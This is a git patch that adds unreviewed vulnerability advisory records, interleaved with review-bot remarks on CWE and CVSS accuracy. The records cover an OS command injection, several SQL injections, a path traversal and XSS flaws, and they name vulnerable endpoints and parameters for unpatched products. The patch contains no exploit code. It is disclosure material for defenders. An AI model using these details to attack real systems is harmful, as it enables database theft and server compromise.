+++ b/advisories/unreviewed/2026/02/GHSA-wh45-rv58-w5rc/GHSA-wh45-rv58-w5rc.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wh45-rv58-w5rc",
+ "modified": "2026-02-22T12:30:26Z",
+ "published": "2026-02-22T12:30:26Z",
+ "aliases": [
+ "CVE-2026-2944"
+ ],
+ "details": "A security flaw has been discovered in Tosei Online Store Management System ネット店舗管理システム 1.01. Affected is the function system of the file /cgi-bin/monitor.php of the component HTTP POST Request Handler. Performing a manipulation of the argument DevId results in os command injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2944"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/CVE-Hunter-Leo/CVE/issues/9"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347314"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347314"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754579"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-77"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T11:16:13Z"
+ }
+}
\ No newline at end of file
From a53df6ebff933488a09834c893173e3c74b8beec Mon Sep 17 00:00:00 2001
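Review bot: `cwe_ids` lists only `"CWE-77"`, while `details` describes OS command injection through the `DevId` argument reaching `system` in `/cgi-bin/monitor.php`; `"CWE-78"` is the specific identifier and should be listed. Both vectors combine `PR:N` with impacts of only `L`, which produces the `MODERATE` label. Command execution in a CGI handler reachable without privileges usually has a larger impact than that, so the label probably understates the exposure and should not drive triage alone. `details` also states that the vendor did not respond, so no fixed version is recorded; until one exists, restricting network access to the management interface is the practical mitigation.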
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 15:31:48 +0000 Subject: [PATCH 45/77] Publish Advisories GHSA-22mj-mcf8-h63q GHSA-2r55-mr9c-c89p GHSA-2r9c-63hg-4rg2 GHSA-3f9r-87f6-jmr2 GHSA-46jj-7w5w-vccv GHSA-5fc6-42f5-w7cm GHSA-5qxq-p7xm-75w5 GHSA-5v2q-744p-wj8v GHSA-85vj-mhr5-mmvc GHSA-87vp-v5jj-xmcq GHSA-8v8j-49p6-4ccp GHSA-96mq-76jj-h8p9 GHSA-982r-pxpw-xv2x GHSA-9fcj-8w2v-j38f GHSA-9pg8-c68j-285r GHSA-ff6v-wx52-q8j8 GHSA-fw7r-mghm-mcfw GHSA-fwf8-cx3q-ch9g GHSA-jcj5-xf7h-rwx7 GHSA-jfw2-q9rx-mg64 GHSA-q2p9-fpj7-9fjp GHSA-qx92-pw43-vf25 GHSA-w7wm-w9qw-pc72 GHSA-wf2x-4p8v-p7m6 --- .../GHSA-22mj-mcf8-h63q.json | 48 +++++++++++++++++ .../GHSA-2r55-mr9c-c89p.json | 44 ++++++++++++++++ .../GHSA-2r9c-63hg-4rg2.json | 44 ++++++++++++++++ .../GHSA-3f9r-87f6-jmr2.json | 44 ++++++++++++++++ .../GHSA-46jj-7w5w-vccv.json | 48 +++++++++++++++++ .../GHSA-5fc6-42f5-w7cm.json | 44 ++++++++++++++++ .../GHSA-5qxq-p7xm-75w5.json | 52 +++++++++++++++++++ .../GHSA-5v2q-744p-wj8v.json | 52 +++++++++++++++++++ .../GHSA-85vj-mhr5-mmvc.json | 52 +++++++++++++++++++ .../GHSA-87vp-v5jj-xmcq.json | 48 +++++++++++++++++ .../GHSA-8v8j-49p6-4ccp.json | 48 +++++++++++++++++ .../GHSA-96mq-76jj-h8p9.json | 52 +++++++++++++++++++ .../GHSA-982r-pxpw-xv2x.json | 48 +++++++++++++++++ .../GHSA-9fcj-8w2v-j38f.json | 52 +++++++++++++++++++ .../GHSA-9pg8-c68j-285r.json | 44 ++++++++++++++++ .../GHSA-ff6v-wx52-q8j8.json | 44 ++++++++++++++++ .../GHSA-fw7r-mghm-mcfw.json | 44 ++++++++++++++++ .../GHSA-fwf8-cx3q-ch9g.json | 52 +++++++++++++++++++ .../GHSA-jcj5-xf7h-rwx7.json | 44 ++++++++++++++++ .../GHSA-jfw2-q9rx-mg64.json | 48 +++++++++++++++++ .../GHSA-q2p9-fpj7-9fjp.json | 48 +++++++++++++++++ .../GHSA-qx92-pw43-vf25.json | 48 +++++++++++++++++ .../GHSA-w7wm-w9qw-pc72.json | 48 +++++++++++++++++ .../GHSA-wf2x-4p8v-p7m6.json | 48 +++++++++++++++++ 24 files changed, 1144 insertions(+) create mode 100644 
advisories/unreviewed/2026/02/GHSA-22mj-mcf8-h63q/GHSA-22mj-mcf8-h63q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2r55-mr9c-c89p/GHSA-2r55-mr9c-c89p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2r9c-63hg-4rg2/GHSA-2r9c-63hg-4rg2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3f9r-87f6-jmr2/GHSA-3f9r-87f6-jmr2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-46jj-7w5w-vccv/GHSA-46jj-7w5w-vccv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5fc6-42f5-w7cm/GHSA-5fc6-42f5-w7cm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5qxq-p7xm-75w5/GHSA-5qxq-p7xm-75w5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5v2q-744p-wj8v/GHSA-5v2q-744p-wj8v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-85vj-mhr5-mmvc/GHSA-85vj-mhr5-mmvc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-87vp-v5jj-xmcq/GHSA-87vp-v5jj-xmcq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8v8j-49p6-4ccp/GHSA-8v8j-49p6-4ccp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-96mq-76jj-h8p9/GHSA-96mq-76jj-h8p9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-982r-pxpw-xv2x/GHSA-982r-pxpw-xv2x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9fcj-8w2v-j38f/GHSA-9fcj-8w2v-j38f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9pg8-c68j-285r/GHSA-9pg8-c68j-285r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ff6v-wx52-q8j8/GHSA-ff6v-wx52-q8j8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fw7r-mghm-mcfw/GHSA-fw7r-mghm-mcfw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fwf8-cx3q-ch9g/GHSA-fwf8-cx3q-ch9g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jcj5-xf7h-rwx7/GHSA-jcj5-xf7h-rwx7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jfw2-q9rx-mg64/GHSA-jfw2-q9rx-mg64.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q2p9-fpj7-9fjp/GHSA-q2p9-fpj7-9fjp.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-qx92-pw43-vf25/GHSA-qx92-pw43-vf25.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w7wm-w9qw-pc72/GHSA-w7wm-w9qw-pc72.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wf2x-4p8v-p7m6/GHSA-wf2x-4p8v-p7m6.json diff --git a/advisories/unreviewed/2026/02/GHSA-22mj-mcf8-h63q/GHSA-22mj-mcf8-h63q.json b/advisories/unreviewed/2026/02/GHSA-22mj-mcf8-h63q/GHSA-22mj-mcf8-h63q.json new file mode 100644 index 0000000000000..40471c0cd6736 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-22mj-mcf8-h63q/GHSA-22mj-mcf8-h63q.json 
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-22mj-mcf8-h63q",
+ "modified": "2026-02-22T15:30:15Z",
+ "published": "2026-02-22T15:30:15Z",
+ "aliases": [
+ "CVE-2019-25455"
+ ],
+ "details": "Web Ofisi E-Ticaret v3 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'a' parameter. Attackers can send GET requests to with malicious 'a' parameter values to extract sensitive database information.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25455"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/47139"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/web-ofisi-e-ticaret-sql-injection-via-arahtml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.web-ofisi.com/detay/e-ticaret-v3-sanal-pos.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T15:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-2r55-mr9c-c89p/GHSA-2r55-mr9c-c89p.json b/advisories/unreviewed/2026/02/GHSA-2r55-mr9c-c89p/GHSA-2r55-mr9c-c89p.json
new file mode 100644
index 0000000000000..152c20860041b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2r55-mr9c-c89p/GHSA-2r55-mr9c-c89p.json
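Review bot: The second sentence of `details` is missing its request target: "Attackers can send GET requests to with malicious 'a' parameter values" has nothing between "to" and "with", so the record does not say which endpoint a defender should monitor or filter. The same gap appears in GHSA-46jj-7w5w-vccv ("send GET requests to with malicious 'klima' values"). The path was presumably dropped when the description was imported; it should be restored from the VulnCheck advisory listed under `references` rather than guessed.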
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2r55-mr9c-c89p",
+ "modified": "2026-02-22T15:30:14Z",
+ "published": "2026-02-22T15:30:14Z",
+ "aliases": [
+ "CVE-2019-25439"
+ ],
+ "details": "NoviSmart CMS contains an SQL injection vulnerability that allows remote attackers to execute arbitrary SQL queries by injecting malicious code through the Referer HTTP header field. Attackers can craft requests with time-based SQL injection payloads in the Referer header to extract sensitive database information or cause denial of service.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25439"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/47152"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/novismart-cms-sql-injection-via-referer-http-header"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T14:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-2r9c-63hg-4rg2/GHSA-2r9c-63hg-4rg2.json b/advisories/unreviewed/2026/02/GHSA-2r9c-63hg-4rg2/GHSA-2r9c-63hg-4rg2.json
new file mode 100644
index 0000000000000..746d8ed08e001
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2r9c-63hg-4rg2/GHSA-2r9c-63hg-4rg2.json
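Review bot: `details` says the injection can "cause denial of service", but both `severity` vectors score availability as none (`A:N` and `VA:N`). Either the vectors should carry an availability impact or the sentence should drop the denial-of-service claim; as written, the `HIGH` rating does not account for it. GHSA-46jj-7w5w-vccv has the same mismatch between its prose and its vectors.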
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2r9c-63hg-4rg2",
+ "modified": "2026-02-22T15:30:14Z",
+ "published": "2026-02-22T15:30:14Z",
+ "aliases": [
+ "CVE-2019-25446"
+ ],
+ "details": "DIGIT CENTRIS ERP contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the datum1, datum2, KID, and PID parameters. Attackers can send POST requests to /korisnikinfo.php with malicious SQL syntax in these parameters to extract or modify sensitive database information.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25446"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/47401"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/digit-centris-erp-every-version-sql-injection-via-datum-parameter"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T14:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-3f9r-87f6-jmr2/GHSA-3f9r-87f6-jmr2.json b/advisories/unreviewed/2026/02/GHSA-3f9r-87f6-jmr2/GHSA-3f9r-87f6-jmr2.json
new file mode 100644
index 0000000000000..0f7520a6f6a29
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-3f9r-87f6-jmr2/GHSA-3f9r-87f6-jmr2.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3f9r-87f6-jmr2",
+ "modified": "2026-02-22T15:30:13Z",
+ "published": "2026-02-22T15:30:13Z",
+ "aliases": [
+ "CVE-2019-25391"
+ ],
+ "details": "Ashop Shopping Cart Software contains a time-based blind SQL injection vulnerability that allows attackers to manipulate database queries through the blacklistitemid parameter. Attackers can send POST requests to the admin/bannedcustomers.php endpoint with crafted SQL payloads using SLEEP functions to extract sensitive database information.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25391"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/46681"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/ashop-shopping-cart-software-lastest-latest-sql-injection-via-bannedcustomersphp"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T14:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-46jj-7w5w-vccv/GHSA-46jj-7w5w-vccv.json b/advisories/unreviewed/2026/02/GHSA-46jj-7w5w-vccv/GHSA-46jj-7w5w-vccv.json
new file mode 100644
index 0000000000000..6525078036031
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-46jj-7w5w-vccv/GHSA-46jj-7w5w-vccv.json
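Review bot: Both `severity` vectors use `PR:N`, yet the endpoint named in `details` is `admin/bannedcustomers.php`, and unlike several neighbouring records the text does not say the attacker is unauthenticated. If the admin area sits behind a login, the vectors should read `PR:H` (or `PR:L`) and the score would drop. This needs confirming against the referenced advisory before the `HIGH` rating is relied on for prioritisation.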
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-46jj-7w5w-vccv",
+ "modified": "2026-02-22T15:30:15Z",
+ "published": "2026-02-22T15:30:15Z",
+ "aliases": [
+ "CVE-2019-25462"
+ ],
+ "details": "Web Ofisi Rent a Car v3 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'klima' parameter. Attackers can send GET requests to with malicious 'klima' values to extract sensitive database information or cause denial of service.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25462"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/47144"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/web-ofisi-rent-a-car-sql-injection-via-klima-parameter"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.web-ofisi.com/detay/rent-a-car-v3.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T15:16:16Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5fc6-42f5-w7cm/GHSA-5fc6-42f5-w7cm.json b/advisories/unreviewed/2026/02/GHSA-5fc6-42f5-w7cm/GHSA-5fc6-42f5-w7cm.json
new file mode 100644
index 0000000000000..c64a22f72b79e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5fc6-42f5-w7cm/GHSA-5fc6-42f5-w7cm.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5fc6-42f5-w7cm",
+ "modified": "2026-02-22T15:30:14Z",
+ "published": "2026-02-22T15:30:14Z",
+ "aliases": [
+ "CVE-2019-25450"
+ ],
+ "details": "Dolibarr ERP/CRM 10.0.1 contains multiple SQL injection vulnerabilities that allow authenticated attackers to manipulate database queries by injecting SQL code through POST parameters. Attackers can inject malicious SQL through parameters like actioncode, demand_reason_id, and availability_id in card.php endpoints to extract sensitive database information using boolean-based blind, error-based, and time-based blind techniques.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25450"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/47370"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/dolibarr-erpcrm-sql-injection-via-cardphp"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T14:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5qxq-p7xm-75w5/GHSA-5qxq-p7xm-75w5.json b/advisories/unreviewed/2026/02/GHSA-5qxq-p7xm-75w5/GHSA-5qxq-p7xm-75w5.json
new file mode 100644
index 0000000000000..7cd2c593b7088
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5qxq-p7xm-75w5/GHSA-5qxq-p7xm-75w5.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5qxq-p7xm-75w5",
+ "modified": "2026-02-22T15:30:15Z",
+ "published": "2026-02-22T15:30:15Z",
+ "aliases": [
+ "CVE-2026-2953"
+ ],
+ "details": "A vulnerability has been found in Dromara UJCMS 101.2. This issue affects the function deleteDirectory of the file WebFileTemplateController.delete of the component Template Handler. Such manipulation leads to path traversal. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2953"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347319"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347319"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755215"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.yuque.com/la12138/pa2fpb/lxngf3d07uyd0nwp?singleDoc"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T14:16:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5v2q-744p-wj8v/GHSA-5v2q-744p-wj8v.json b/advisories/unreviewed/2026/02/GHSA-5v2q-744p-wj8v/GHSA-5v2q-744p-wj8v.json
new file mode 100644
index 0000000000000..b184a7635a58a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5v2q-744p-wj8v/GHSA-5v2q-744p-wj8v.json
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5v2q-744p-wj8v", + "modified": "2026-02-22T15:30:13Z", + "published": "2026-02-22T15:30:13Z", + "aliases": [ + "CVE-2026-2946" + ], + "details": "A security vulnerability has been detected in rymcu forest up to 0.0.5. Affected by this issue is the function XssUtils.replaceHtmlCode of the file src/main/java/com/rymcu/forest/util/XssUtils.java of the component Article Content/Comments/Portfolio. The manipulation leads to cross site scripting. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2946" + }, + { + "type": "WEB", + "url": "https://fx4tqqfvdw4.feishu.cn/docx/CvYzdxDNDoXWdKxvaehcvb1rnQK?from=from_copylink" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347316" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347316" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755037" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T13:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-85vj-mhr5-mmvc/GHSA-85vj-mhr5-mmvc.json b/advisories/unreviewed/2026/02/GHSA-85vj-mhr5-mmvc/GHSA-85vj-mhr5-mmvc.json new file mode 100644 index 0000000000000..81ee6d397a2e4 --- /dev/null 
+++ b/advisories/unreviewed/2026/02/GHSA-85vj-mhr5-mmvc/GHSA-85vj-mhr5-mmvc.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-85vj-mhr5-mmvc", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2026-2947" + ], + "details": "A vulnerability was detected in rymcu forest up to 0.0.5. This affects the function updateUserInfo of the file - src/main/java/com/rymcu/forest/web/api/user/UserInfoController.java of the component User Profile Handler. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2947" + }, + { + "type": "WEB", + "url": "https://fx4tqqfvdw4.feishu.cn/docx/MBymdGpuFoGQYuxEiH2cdC5BnSe?from=from_copylink" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347317" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347317" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755039" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-87vp-v5jj-xmcq/GHSA-87vp-v5jj-xmcq.json b/advisories/unreviewed/2026/02/GHSA-87vp-v5jj-xmcq/GHSA-87vp-v5jj-xmcq.json new file mode 100644 index 0000000000000..a18a6537c1de9 --- /dev/null 
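Review bot: The `details` text of GHSA-85vj-mhr5-mmvc has a stray `- ` in front of the source path (`of the file - src/main/java/...`), which the sibling record GHSA-5v2q-744p-wj8v for the same project does not have. It reads as part of the path when copied out; the sentence should read `of the file src/main/java/com/rymcu/forest/web/api/user/UserInfoController.java`. The text is imported, so the durable fix is presumably in the upstream CVE description.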
